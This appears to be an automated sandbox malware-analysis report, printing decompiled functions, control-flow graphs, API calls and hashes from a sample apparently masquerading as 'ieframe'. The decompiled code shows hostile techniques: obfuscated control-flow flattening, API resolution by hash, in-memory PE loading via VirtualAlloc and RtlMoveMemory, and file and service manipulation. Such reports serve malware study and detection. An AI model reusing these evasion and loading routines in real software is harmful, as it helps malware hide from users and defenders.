                                                        • Opcode ID: 901f3f3df0e6771c802e06df2c222d1fd8829cd6446574cfc36f66ae3e7a5bc9
                                                        • Instruction ID: 827c36d81320fa2852553094f2cfa80cd2863c5697ece3554073732a51f53705
                                                        • Opcode Fuzzy Hash: 901f3f3df0e6771c802e06df2c222d1fd8829cd6446574cfc36f66ae3e7a5bc9
                                                        • Instruction Fuzzy Hash: 4661E631B043255BEB2AEF68FC9676A329DEB90B04F15042EF145DF251EA34CD058BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 105 328400-3284df 106 3284e3-3284e9 105->106 107 3285c8-3285ce 106->107 108 3284ef 106->108 109 328630-328637 107->109 110 3285d0-3285d6 107->110 111 3284f5-3284fb 108->111 112 32866c-3286b4 call 32b6e0 108->112 118 328654-328667 109->118 119 328639-32864f call 323f00 call 323e60 109->119 113 3285b1-3285b7 110->113 114 3285d8-3285e0 110->114 115 32854a-328551 111->115 116 3284fd-328503 111->116 121 3285bd-3285c7 112->121 134 3286ba 112->134 113->106 113->121 124 3285e2-3285fa call 323f00 call 323e60 114->124 125 328600-328624 CreateFileW 114->125 122 328553-328569 call 323f00 call 323e60 115->122 123 32856e-328591 115->123 126 328543-328548 116->126 127 328505-32850b 116->127 118->106 119->118 122->123 148 328593-3285a9 call 323f00 call 323e60 123->148 149 3285ae 123->149 124->125 125->121 135 328626-32862b 125->135 126->106 127->113 133 328511-328518 127->133 139 328535-328541 133->139 140 32851a-328530 call 323f00 call 323e60 133->140 142 3286c4-3286d1 134->142 143 3286bc-3286be 134->143 135->106 139->106 140->139 143->121 143->142 148->149 149->113
                                                        C-Code - Quality: 66%
                                                        			E00328400(void* __ebx, void* __ebp) {
                                                        				short _v524;
                                                        				char _v564;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				signed int _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				intOrPtr _v596;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t92;
                                                        				intOrPtr* _t93;
                                                        				void* _t95;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				signed int _t119;
                                                        				void* _t121;
                                                        				void* _t122;
                                                        				signed int _t123;
                                                        				intOrPtr _t124;
                                                        				void* _t126;
                                                        				void* _t129;
                                                        
                                                        				_t126 = __ebp;
                                                        				_t101 = __ebx;
                                                        				_v584 = 0xdbec;
                                                        				_v584 = _v584 + 0xa437;
                                                        				_v584 = _v584 | 0x0afcf5fb;
                                                        				_v584 = _v584 ^ 0x9493ba05;
                                                        				_v584 = _v584 >> 0xc;
                                                        				_v584 = _v584 >> 0xb;
                                                        				_v584 = _v584 ^ 0x000001bc;
                                                        				_v592 = 0x7d19;
                                                        				_v592 = _v592 << 9;
                                                        				_v592 = _v592 >> 0xe;
                                                        				_v592 = _v592 + 0xffff07e5;
                                                        				_v592 = _v592 | 0x8aea6eef;
                                                        				_v592 = _v592 + 0xd867;
                                                        				_v592 = _v592 + 0x9c41;
                                                        				_v592 = _v592 + 0x3de0;
                                                        				_v592 = _v592 + 0x218b;
                                                        				_v592 = _v592 ^ 0x00014403;
                                                        				_v588 = 0x2591;
                                                        				_t123 = 0x4a20241;
                                                        				_v588 = _v588 * 0x7d;
                                                        				_v588 = _v588 + 0x8d68;
                                                        				_v588 = _v588 + 0xffff8911;
                                                        				_v588 = _v588 * 0x6a;
                                                        				_v588 = _v588 + 0xffff93d5;
                                                        				_v588 = _v588 ^ 0x07a13cd2;
                                                        				_v580 = 0x789;
                                                        				_v580 = _v580 >> 1;
                                                        				_v580 = _v580 ^ 0xaee58af2;
                                                        				_v580 = _v580 ^ 0xaee58936;
                                                        				_t122 = _v580;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t129 = _t123 - 0x1aed34c4;
                                                        						if(_t129 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t129 == 0) {
                                                        							_v580 = 0xa8c00;
                                                        							_v576 = 0;
                                                        							_v596 = E0032B6E0(_v580, _v576, 0x989680, 0);
                                                        							_v592 = _t119;
                                                        							_t121 = _v588 - _v564;
                                                        							_t124 = _v596;
                                                        							asm("sbb ecx, [esp+0x3c]");
                                                        							__eflags = _v584 - _v592;
                                                        							if(__eflags < 0) {
                                                        								goto L16;
                                                        							} else {
                                                        								if(__eflags > 0) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									__eflags = _t121 - _t124;
                                                        									if(_t121 < _t124) {
                                                        										goto L16;
                                                        									} else {
                                                        										goto L29;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(_t123 == 0x12f5064) {
                                                        								_t82 =  *0x32dec0;
                                                        								__eflags = _t82;
                                                        								if(_t82 == 0) {
                                                        									_t99 = E00323F00(0x9bab0b12);
                                                        									_t119 = 0x8b0c7279;
                                                        									_t82 = E00323E60(_t101, _t99, 0x8b0c7279, _t126);
                                                        									 *0x32dec0 = _t82;
                                                        								}
                                                        								 *_t82(_t122, 0,  &_v564, 0x28);
                                                        								asm("sbb esi, esi");
                                                        								_t85 =  *0x32de3c;
                                                        								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
                                                        								__eflags = _t85;
                                                        								if(_t85 == 0) {
                                                        									_t98 = E00323F00(0x9bab0b12);
                                                        									_t119 = 0x20de7595;
                                                        									_t85 = E00323E60(_t101, _t98, 0x20de7595, _t126);
                                                        									 *0x32de3c = _t85;
                                                        								}
                                                        								 *_t85(_t122);
                                                        								goto L15;
                                                        							} else {
                                                        								if(_t123 == 0x4a20241) {
                                                        									_t123 = 0x33602029;
                                                        									continue;
                                                        								} else {
                                                        									if(_t123 != 0xd59c266) {
                                                        										goto L15;
                                                        									} else {
                                                        										_t93 =  *0x32e1d4;
                                                        										if(_t93 == 0) {
                                                        											_t97 = E00323F00(0x9bab0b12);
                                                        											_t119 = 0xa229df38;
                                                        											_t93 = E00323E60(_t101, _t97, 0xa229df38, _t126);
                                                        											 *0x32e1d4 = _t93;
                                                        										}
                                                        										 *_t93( &_v572);
                                                        										_t123 = 0x1aed34c4;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t123 - 0x33602029;
                                                        					if(_t123 == 0x33602029) {
                                                        						_t75 =  *0x32e3f4;
                                                        						__eflags = _t75;
                                                        						if(_t75 == 0) {
                                                        							_t100 = E00323F00(0x9bab0b12);
                                                        							_t119 = 0x7dc9b9bb;
                                                        							_t75 = E00323E60(_t101, _t100, 0x7dc9b9bb, _t126);
                                                        							 *0x32e3f4 = _t75;
                                                        						}
                                                        						 *_t75(0,  &_v524, 0x104);
                                                        						_t123 = 0x3ae77736;
                                                        						goto L1;
                                                        					} else {
                                                        						__eflags = _t123 - 0x3ae77736;
                                                        						if(_t123 != 0x3ae77736) {
                                                        							goto L15;
                                                        						} else {
                                                        							__eflags =  *0x32de04;
                                                        							if( *0x32de04 == 0) {
                                                        								_t95 = E00323F00(0x9bab0b12);
                                                        								_t119 = 0xb66d748a;
                                                        								 *0x32de04 = E00323E60(_t101, _t95, 0xb66d748a, _t126);
                                                        							}
                                                        							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
                                                        							_t122 = _t92;
                                                        							__eflags = _t122 - 0xffffffff;
                                                        							if(_t122 == 0xffffffff) {
                                                        								break;
                                                        							} else {
                                                        								_t123 = 0x12f5064;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L15:
                                                        					__eflags = _t123 - 0x13ef6fdf;
                                                        				} while (_t123 != 0x13ef6fdf);
                                                        				L16:
                                                        				__eflags = 0;
                                                        				return 0;
                                                        				goto L30;
                                                        			}






























                                                        0x00328400
                                                        0x00328400
                                                        0x00328406
                                                        0x0032840e
                                                        0x00328416
                                                        0x0032841e
                                                        0x00328426
                                                        0x0032842b
                                                        0x00328430
                                                        0x00328438
                                                        0x00328440
                                                        0x00328445
                                                        0x0032844a
                                                        0x00328452
                                                        0x0032845a
                                                        0x00328462
                                                        0x0032846a
                                                        0x00328472
                                                        0x0032847a
                                                        0x00328482
                                                        0x00328491
                                                        0x00328496
                                                        0x0032849a
                                                        0x003284a2
                                                        0x003284af
                                                        0x003284b3
                                                        0x003284bb
                                                        0x003284c3
                                                        0x003284cb
                                                        0x003284cf
                                                        0x003284d7
                                                        0x003284df
                                                        0x003284df
                                                        0x003284e3
                                                        0x003284e3
                                                        0x003284e3
                                                        0x003284e3
                                                        0x003284e9
                                                        0x00000000
                                                        0x00000000
                                                        0x003284ef
                                                        0x0032866e
                                                        0x00328676
                                                        0x00328696
                                                        0x0032869a
                                                        0x003286a2
                                                        0x003286a6
                                                        0x003286aa
                                                        0x003286b2
                                                        0x003286b4
                                                        0x00000000
                                                        0x003286ba
                                                        0x003286ba
                                                        0x003286c5
                                                        0x003286d1
                                                        0x003286bc
                                                        0x003286bc
                                                        0x003286be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003286be
                                                        0x003286ba
                                                        0x003284f5
                                                        0x003284fb
                                                        0x0032854a
                                                        0x0032854f
                                                        0x00328551
                                                        0x00328558
                                                        0x0032855d
                                                        0x00328564
                                                        0x00328569
                                                        0x00328569
                                                        0x00328578
                                                        0x0032857c
                                                        0x0032857e
                                                        0x00328589
                                                        0x0032858f
                                                        0x00328591
                                                        0x00328598
                                                        0x0032859d
                                                        0x003285a4
                                                        0x003285a9
                                                        0x003285a9
                                                        0x003285af
                                                        0x00000000
                                                        0x003284fd
                                                        0x00328503
                                                        0x00328543
                                                        0x00000000
                                                        0x00328505
                                                        0x0032850b
                                                        0x00000000
                                                        0x00328511
                                                        0x00328511
                                                        0x00328518
                                                        0x0032851f
                                                        0x00328524
                                                        0x0032852b
                                                        0x00328530
                                                        0x00328530
                                                        0x0032853a
                                                        0x0032853c
                                                        0x00000000
                                                        0x0032853c
                                                        0x0032850b
                                                        0x00328503
                                                        0x003284fb
                                                        0x00000000
                                                        0x003284ef
                                                        0x003285c8
                                                        0x003285ce
                                                        0x00328630
                                                        0x00328635
                                                        0x00328637
                                                        0x0032863e
                                                        0x00328643
                                                        0x0032864a
                                                        0x0032864f
                                                        0x0032864f
                                                        0x00328660
                                                        0x00328662
                                                        0x00000000
                                                        0x003285d0
                                                        0x003285d0
                                                        0x003285d6
                                                        0x00000000
                                                        0x003285d8
                                                        0x003285de
                                                        0x003285e0
                                                        0x003285e7
                                                        0x003285ec
                                                        0x003285fa
                                                        0x003285fa
                                                        0x0032861d
                                                        0x0032861f
                                                        0x00328621
                                                        0x00328624
                                                        0x00000000
                                                        0x00328626
                                                        0x00328626
                                                        0x00000000
                                                        0x00328626
                                                        0x00328624
                                                        0x003285d6
                                                        0x00000000
                                                        0x003285b1
                                                        0x003285b1
                                                        0x003285b1
                                                        0x003285bd
                                                        0x003285bd
                                                        0x003285c7
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 0032861D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: ) `3$) `3$6w:$6w:$=
                                                        • API String ID: 823142352-4124229693
                                                        • Opcode ID: 22a79285d9e9cc99f34fff6600fc122b5a6e0eef6261ff77b87543bd9b8025d3
                                                        • Instruction ID: e68fab6af7fe67c3410bf04ec3eda516f5ee4496031c7370611fd9af3b1473ee
                                                        • Opcode Fuzzy Hash: 22a79285d9e9cc99f34fff6600fc122b5a6e0eef6261ff77b87543bd9b8025d3
                                                        • Instruction Fuzzy Hash: 65611771A093219FC716DF68E44562FBBE5ABD0714F11881CF4999B290DB78DD098FC2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 160 310d60-310dd5 call 310ed0 VirtualAlloc RtlMoveMemory 164 310ddb-310dde 160->164 165 310ebe-310ec4 160->165 164->165 166 310de4-310de6 164->166 166->165 167 310dec-310df0 166->167 167->165 169 310df6-310dfd 167->169 170 310e03-310e36 call 311140 RtlMoveMemory 169->170 171 310eaf-310ebb 169->171 170->165 175 310e3c-310e4a VirtualAlloc 170->175 176 310e89-310ea0 RtlFillMemory 175->176 177 310e4c-310e52 175->177 176->165 183 310ea2-310ea5 176->183 178 310e54-310e56 177->178 179 310e5a-310e68 177->179 178->179 179->165 181 310e6a-310e7d RtlMoveMemory 179->181 181->165 182 310e7f-310e83 181->182 182->165 184 310e85 182->184 183->165 185 310ea7-310ea9 183->185 184->176 185->170 185->171
                                                        APIs
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00310F08
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00310F3E
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00310F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00310DB4
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00310DC3
                                                          • Part of subcall function 00311140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00310EFD,00000000), ref: 00311155
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 00310E11
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00310E3D
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00310E6C
                                                        • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 00310E98
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285120425.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_310000_ieframe.jbxd
                                                        Similarity
                                                        • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                        • String ID:
                                                        • API String ID: 3581289920-0
                                                        • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction ID: f900eb0e888b60a0c8bdd2b779422d633d7d2deeebf80d494bc9143cef63afbd
                                                        • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction Fuzzy Hash: D631CE72A043406BD22DDB61C844AEB73EAEBCC380F04092CB648D7351D6B5E8C087A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 186 323780-323793 187 3237b0-3237c5 186->187 188 323795-3237ab call 323f00 call 323e60 186->188 192 3237e2-3237fa 187->192 193 3237c7-3237dd call 323f00 call 323e60 187->193 188->187 200 323817-323832 192->200 201 3237fc-323812 call 323f00 call 323e60 192->201 193->192 206 323834-32384a call 323f00 call 323e60 200->206 207 32384f-32385e 200->207 201->200 206->207 214 323860-323876 call 323f00 call 323e60 207->214 215 32387b-3238b4 207->215 214->215 220 3238d1-3238e2 SHFileOperationW 215->220 221 3238b6-3238cc call 323f00 call 323e60 215->221 221->220
                                                        C-Code - Quality: 62%
                                                        			E00323780(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                        				char _v520;
                                                        				char _v528;
                                                        				char _v536;
                                                        				char _v1040;
                                                        				char _v1056;
                                                        				short _v1072;
                                                        				char* _v1076;
                                                        				char* _v1080;
                                                        				intOrPtr _v1084;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t14;
                                                        				intOrPtr* _t16;
                                                        				intOrPtr* _t18;
                                                        				intOrPtr* _t20;
                                                        				signed int _t26;
                                                        				void* _t36;
                                                        				void* _t63;
                                                        				void* _t66;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				void* _t71;
                                                        				void* _t72;
                                                        				struct _SHFILEOPSTRUCTW* _t73;
                                                        
                                                        				_t70 =  &_v1072;
                                                        				_t12 =  *0x32ddc0;
                                                        				_t66 = __ecx;
                                                        				_t63 = __edx;
                                                        				if(_t12 == 0) {
                                                        					_t12 = E00323E60(_t36, E00323F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x32ddc0 = _t12;
                                                        				}
                                                        				 *_t12( &_v1072, 0, 0x1e);
                                                        				_t14 =  *0x32ddc0;
                                                        				_t71 = _t70 + 0xc;
                                                        				if(_t14 == 0) {
                                                        					_t14 = E00323E60(_t36, E00323F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x32ddc0 = _t14;
                                                        				}
                                                        				 *_t14( &_v1040, 0, 0x208);
                                                        				_t16 =  *0x32ddc0;
                                                        				_t72 = _t71 + 0xc;
                                                        				if(_t16 == 0) {
                                                        					_t16 = E00323E60(_t36, E00323F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x32ddc0 = _t16;
                                                        				}
                                                        				 *_t16( &_v520, 0, 0x208);
                                                        				_t18 =  *0x32e298;
                                                        				_t73 = _t72 + 0xc;
                                                        				if(_t18 == 0) {
                                                        					_t18 = E00323E60(_t36, E00323F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x32e298 = _t18;
                                                        				}
                                                        				 *_t18( &_v1040, _t66);
                                                        				_t20 =  *0x32e298;
                                                        				if(_t20 == 0) {
                                                        					_t20 = E00323E60(_t36, E00323F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x32e298 = _t20;
                                                        				}
                                                        				 *_t20( &_v528, _t63);
                                                        				_v1084 = 1;
                                                        				_v1080 =  &_v1056;
                                                        				_v1076 =  &_v536;
                                                        				_v1072 = 0xe14;
                                                        				if( *0x32e30c == 0) {
                                                        					 *0x32e30c = E00323E60(_t36, E00323F00(0xd9518805), 0x262a6194, _t69);
                                                        				}
                                                        				_t26 = SHFileOperationW(_t73); // executed
                                                        				asm("sbb eax, eax");
                                                        				return  ~_t26 + 1;
                                                        			}


























                                                        0x00323785
                                                        0x00323780
                                                        0x0032378c
                                                        0x0032378f
                                                        0x00323793
                                                        0x003237a6
                                                        0x003237ab
                                                        0x003237ab
                                                        0x003237b9
                                                        0x003237bb
                                                        0x003237c0
                                                        0x003237c5
                                                        0x003237d8
                                                        0x003237dd
                                                        0x003237dd
                                                        0x003237ee
                                                        0x003237f0
                                                        0x003237f5
                                                        0x003237fa
                                                        0x0032380d
                                                        0x00323812
                                                        0x00323812
                                                        0x00323826
                                                        0x00323828
                                                        0x0032382d
                                                        0x00323832
                                                        0x00323845
                                                        0x0032384a
                                                        0x0032384a
                                                        0x00323855
                                                        0x00323857
                                                        0x0032385e
                                                        0x00323871
                                                        0x00323876
                                                        0x00323876
                                                        0x00323884
                                                        0x0032388a
                                                        0x00323892
                                                        0x0032389d
                                                        0x003238a6
                                                        0x003238b4
                                                        0x003238cc
                                                        0x003238cc
                                                        0x003238d5
                                                        0x003238d9
                                                        0x003238e2

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileOperation
                                                        • String ID: X~$X~$X~
                                                        • API String ID: 3080627654-3258893172
                                                        • Opcode ID: 5cc5cb0b670ad7566af78c1b329c90af63b99ba2aa252c5eb668a17b53a8f3e3
                                                        • Instruction ID: b1a0ce7ae2464553657d4f24f9bcb00ef109a79e42c29c82fad0088dc372eec8
                                                        • Opcode Fuzzy Hash: 5cc5cb0b670ad7566af78c1b329c90af63b99ba2aa252c5eb668a17b53a8f3e3
                                                        • Instruction Fuzzy Hash: 3A31D0717003615BD726EB79FC017AB37EAAF84704F10092CF515CB285EA38DA0A8B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 228 328e80-328e98 229 328ea0-328ea5 228->229 230 328f7a-328f7f 229->230 231 328eab 229->231 232 329011-329016 230->232 233 328f85-328f8a 230->233 234 328eb1-328eb6 231->234 235 328f3f-328f46 231->235 232->229 236 328fce-328fd5 233->236 237 328f8c-328f91 233->237 238 32901b-329022 234->238 239 328ebc-328ec1 234->239 240 328f63-328f75 235->240 241 328f48-328f5e call 323f00 call 323e60 235->241 246 328ff2-32900c OpenServiceW 236->246 247 328fd7-328fed call 323f00 call 323e60 236->247 242 328f93-328fa3 237->242 243 328fbb-328fc0 237->243 249 329024-32903a call 323f00 call 323e60 238->249 250 32903f 238->250 244 328ec3-328ec8 239->244 245 328efc-328f03 239->245 240->229 241->240 252 328fa5-328fac 242->252 253 328fae-328fb6 242->253 243->229 255 328fc6-328fcd 243->255 244->243 254 328ece-328ed5 244->254 258 328f20-328f2f 245->258 259 328f05-328f1b call 323f00 call 323e60 245->259 246->229 247->246 249->250 264 329042-329049 250->264 252->252 252->253 253->229 262 328ef2-328efa 254->262 263 328ed7-328eed call 323f00 call 323e60 254->263 258->264 275 328f35-328f3a 258->275 259->258 262->229 263->262 275->229
                                                        C-Code - Quality: 66%
                                                        			E00328E80() {
                                                        				short* _v4;
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t4;
                                                        				void* _t6;
                                                        				intOrPtr* _t11;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t19;
                                                        				intOrPtr* _t22;
                                                        				void* _t25;
                                                        				void* _t42;
                                                        				short* _t43;
                                                        				intOrPtr _t44;
                                                        				short* _t45;
                                                        				void* _t46;
                                                        				void* _t47;
                                                        
                                                        				_t25 = _v4;
                                                        				_t4 = 0x1779a150;
                                                        				_t46 = _v4;
                                                        				_t43 = _v4;
                                                        				_t42 = 0;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t47 = _t4 - 0xebfcc22;
                                                        						if(_t47 <= 0) {
                                                        							break;
                                                        						}
                                                        						if(_t4 == 0x1779a150) {
                                                        							_t4 = 0x23287775;
                                                        							continue;
                                                        						} else {
                                                        							if(_t4 == 0x1e3d7119) {
                                                        								if( *0x32e270 == 0) {
                                                        									 *0x32e270 = E00323E60(_t25, E00323F00(0x26f5757c), 0x56e230f9, _t46);
                                                        								}
                                                        								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
                                                        								_t25 = _t6;
                                                        								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
                                                        								continue;
                                                        							} else {
                                                        								if(_t4 != 0x23287775) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t44 =  *0x32e54c; // 0x8fdff0
                                                        									_t45 = _t44 + 0x260;
                                                        									while( *_t45 != 0x5c) {
                                                        										_t45 = _t45 + 2;
                                                        									}
                                                        									_t43 = _t45 + 2;
                                                        									_t4 = 0x10ada17;
                                                        									continue;
                                                        								}
                                                        							}
                                                        						}
                                                        						L32:
                                                        					}
                                                        					if(_t47 == 0) {
                                                        						_t11 =  *0x32e4c8;
                                                        						if(_t11 == 0) {
                                                        							_t11 = E00323E60(_t25, E00323F00(0x26f5757c), 0xe9d3e51f, _t46);
                                                        							 *0x32e4c8 = _t11;
                                                        						}
                                                        						 *_t11(_t25);
                                                        						_t42 =  !=  ? 1 : _t42;
                                                        						_t4 = 0xd10de09;
                                                        						goto L1;
                                                        					} else {
                                                        						if(_t4 == 0xbf6010) {
                                                        							_t15 =  *0x32e18c;
                                                        							if(_t15 == 0) {
                                                        								_t15 = E00323E60(_t25, E00323F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        								 *0x32e18c = _t15;
                                                        							}
                                                        							 *_t15(_t46);
                                                        							goto L31;
                                                        						} else {
                                                        							if(_t4 == 0x10ada17) {
                                                        								_t19 =  *0x32e310;
                                                        								if(_t19 == 0) {
                                                        									_t19 = E00323E60(_t25, E00323F00(0x26f5757c), 0x9ba7cd1, _t46);
                                                        									 *0x32e310 = _t19;
                                                        								}
                                                        								_t46 =  *_t19(0, 0, 0xf003f);
                                                        								if(_t46 == 0) {
                                                        									L31:
                                                        									return _t42;
                                                        								} else {
                                                        									_t4 = 0x1e3d7119;
                                                        									goto L1;
                                                        								}
                                                        							} else {
                                                        								if(_t4 != 0xd10de09) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t22 =  *0x32e18c;
                                                        									if(_t22 == 0) {
                                                        										_t22 = E00323E60(_t25, E00323F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        										 *0x32e18c = _t22;
                                                        									}
                                                        									 *_t22(_t25);
                                                        									_t4 = 0xbf6010;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L32;
                                                        					L22:
                                                        				} while (_t4 != 0x2dd4caa9);
                                                        				return _t42;
                                                        				goto L32;
                                                        			}




















                                                        0x00328e82
                                                        0x00328e86
                                                        0x00328e8c
                                                        0x00328e91
                                                        0x00328e96
                                                        0x00328e98
                                                        0x00328ea0
                                                        0x00328ea0
                                                        0x00328ea0
                                                        0x00328ea0
                                                        0x00328ea5
                                                        0x00000000
                                                        0x00000000
                                                        0x00328f7f
                                                        0x00329011
                                                        0x00000000
                                                        0x00328f85
                                                        0x00328f8a
                                                        0x00328fd5
                                                        0x00328fed
                                                        0x00328fed
                                                        0x00328ff9
                                                        0x00328ffb
                                                        0x00329009
                                                        0x00000000
                                                        0x00328f8c
                                                        0x00328f91
                                                        0x00000000
                                                        0x00328f93
                                                        0x00328f93
                                                        0x00328f99
                                                        0x00328fa3
                                                        0x00328fa5
                                                        0x00328fa8
                                                        0x00328fae
                                                        0x00328fb1
                                                        0x00000000
                                                        0x00328fb1
                                                        0x00328f91
                                                        0x00328f8a
                                                        0x00000000
                                                        0x00328f7f
                                                        0x00328eab
                                                        0x00328f3f
                                                        0x00328f46
                                                        0x00328f59
                                                        0x00328f5e
                                                        0x00328f5e
                                                        0x00328f64
                                                        0x00328f6d
                                                        0x00328f70
                                                        0x00000000
                                                        0x00328eb1
                                                        0x00328eb6
                                                        0x0032901b
                                                        0x00329022
                                                        0x00329035
                                                        0x0032903a
                                                        0x0032903a
                                                        0x00329040
                                                        0x00000000
                                                        0x00328ebc
                                                        0x00328ec1
                                                        0x00328efc
                                                        0x00328f03
                                                        0x00328f16
                                                        0x00328f1b
                                                        0x00328f1b
                                                        0x00328f2b
                                                        0x00328f2f
                                                        0x00329042
                                                        0x00329049
                                                        0x00328f35
                                                        0x00328f35
                                                        0x00000000
                                                        0x00328f35
                                                        0x00328ec3
                                                        0x00328ec8
                                                        0x00000000
                                                        0x00328ece
                                                        0x00328ece
                                                        0x00328ed5
                                                        0x00328ee8
                                                        0x00328eed
                                                        0x00328eed
                                                        0x00328ef3
                                                        0x00328ef5
                                                        0x00000000
                                                        0x00328ef5
                                                        0x00328ec8
                                                        0x00328ec1
                                                        0x00328eb6
                                                        0x00000000
                                                        0x00328fbb
                                                        0x00328fbb
                                                        0x00328fcd
                                                        0x00000000

                                                        APIs
                                                        • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,008FDFF0,00328782,?,3251FEFE,?), ref: 00328FF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenService
                                                        • String ID: uw(#$uw(#
                                                        • API String ID: 3098006287-1105621689
                                                        • Opcode ID: 93ac343f2b2eebd6f96e2df9ea73c389cc8eafc58c868227d88d6f34d3b6adcf
                                                        • Instruction ID: 5d366379ddddb9562cc4a27050ce3cd5003dd0fcf3451574852b698a4dd4b238
                                                        • Opcode Fuzzy Hash: 93ac343f2b2eebd6f96e2df9ea73c389cc8eafc58c868227d88d6f34d3b6adcf
                                                        • Instruction Fuzzy Hash: AC411B31B06234ABDB33A7BDBC8177A23DAA794750F120829F545CBB41EE34CC404791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
